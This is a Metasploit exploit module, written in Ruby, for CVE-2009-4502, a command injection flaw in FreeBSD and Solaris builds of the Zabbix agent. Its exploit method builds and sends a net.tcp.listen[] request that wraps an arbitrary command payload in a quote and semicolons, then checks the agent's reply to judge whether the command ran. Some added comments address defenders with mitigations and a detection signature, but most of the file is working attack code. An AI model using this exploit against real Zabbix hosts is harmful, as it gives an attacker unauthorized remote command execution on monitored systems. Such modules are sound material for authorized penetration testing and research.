GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/misc/zabbix_agent_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit module for CVE-2009-4502. Per its own description, it targets a
# metacharacter injection flaw in the FreeBSD and Solaris builds of the Zabbix
# agent, reached through the net.tcp.listen[] item key.
#
# Notes for defenders reading this module:
# - The description and the status messages below both state that the agent
#   only answers peers on its authorized-server list, so the request has to
#   arrive from one of those addresses. Keep that list minimal and filter the
#   agent port (10050 is the default registered here) at the network layer.
# - The request built in #exploit carries a quote and semicolons inside the
#   net.tcp.listen[] argument. That argument is presumably meant to be a bare
#   port number, so anything else in it is a candidate detection signature
#   for traffic to the agent port -- confirm against legitimate item keys.
# - Affected and fixed releases are not stated in this file; see the Zabbix
#   issue listed under 'References'.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  # Registers the module metadata and the default agent port.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    module_info = update_info(
      info,
      'Name' => 'Zabbix Agent net.tcp.listen Command Injection',
      'Description' => %q{
        This module exploits a metacharacter injection vulnerability
        in the FreeBSD and Solaris versions of the Zabbix agent. This flaw
        can only be exploited if the attacker can hijack the IP address
        of an authorized server (as defined in the configuration file).
      },
      'Author' => [ 'hdm' ],
      'License' => MSF_LICENSE,
      'References' => [
        [ 'CVE', '2009-4502' ],
        [ 'OSVDB', '60956' ],
        [ 'URL', 'https://support.zabbix.com/browse/ZBX-1032'],
      ],
      'Platform' => ['unix'],
      'Arch' => ARCH_CMD,
      'Privileged' => false,
      'Payload' => {
        # The single quote is excluded because the request in #exploit uses
        # it as a delimiter around the command.
        'BadChars' => "'",
        'Space' => 1024,
        'DisableNops' => true,
        'Compat' => {
          'PayloadType' => 'cmd',
          'RequiredCmd' => 'generic perl telnet',
        }
      },
      'Targets' => [
        [ 'Automatic Target', {}]
      ],
      'DefaultTarget' => 0,
      'DisclosureDate' => '2009-09-10',
      # Reliability, stability and side effects have not been assessed for
      # this module; all three are left at the framework's UNKNOWN values.
      'Notes' => {
        'Reliability' => UNKNOWN_RELIABILITY,
        'Stability' => UNKNOWN_STABILITY,
        'SideEffects' => UNKNOWN_SIDE_EFFECTS
      }
    )
    super(module_info)

    register_options([Opt::RPORT(10050)])
  end

  # Sends one net.tcp.listen[] request to the agent and reports how the
  # agent answered. The outcome is inferred from the reply text only; the
  # method does not verify that anything ran on the remote host.
  #
  # @return [void]
  def exploit
    connect

    # Port value in the range 1..1024, used as the leading part of the
    # item-key argument.
    listen_port = rand(1024) + 1
    request = "net.tcp.listen[#{listen_port}';#{payload.encoded};']\n"

    print_status("Sending net.tcp.listen() request to the zabbix agent...")
    sock.put(request)

    # Wait up to 5 seconds for a reply; a connection closed by the peer
    # (EOFError) is treated the same as no reply at all.
    reply =
      begin
        sock.get_once(-1, 5)
      rescue ::EOFError
        nil
      end

    # Map the reply to the diagnostic the module prints. From the defensive
    # side: silence is attributed to the agent's server allow list, and
    # ZBX_NOTSUPPORTED to an agent build or OS that is not affected.
    failure =
      if !reply
        "The zabbix agent did not reply, our IP must not be in the allowed server list."
      elsif reply.match?(/ZBX_NOTSUPPORTED/)
        "The zabbix agent is not running a vulnerable version or operating system."
      elsif !reply.match?(/ZBXD/)
        "The zabbix agent returned an unknown response."
      end

    if failure
      print_status(failure)
      disconnect
      return
    end

    print_status("The zabbix agent should have executed our command.")
    disconnect
  end
end